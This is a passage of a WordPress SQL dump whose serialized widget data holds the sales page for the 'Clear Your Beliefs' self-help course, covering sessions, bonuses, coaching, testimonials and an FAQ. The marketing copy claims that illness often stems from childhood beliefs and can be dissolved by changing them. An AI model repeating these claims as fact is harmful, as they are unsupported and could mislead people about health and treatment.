class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(12434, 114, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(12432, 114, 'rt_custom_css', ''),
(12433, 114, '_wpb_vc_js_status', 'false'),
(1852, 2152, '_menu_item_type', 'post_type'),
(1853, 2152, '_menu_item_menu_item_parent', '0'),
(1854, 2152, '_menu_item_object_id', '2094'),
(1855, 2152, '_menu_item_object', 'page'),
(1856, 2152, '_menu_item_target', ''),
(1857, 2152, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1858, 2152, '_menu_item_xfn', ''),
(1859, 2152, '_menu_item_url', '');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1862, 2155, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:71182:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right 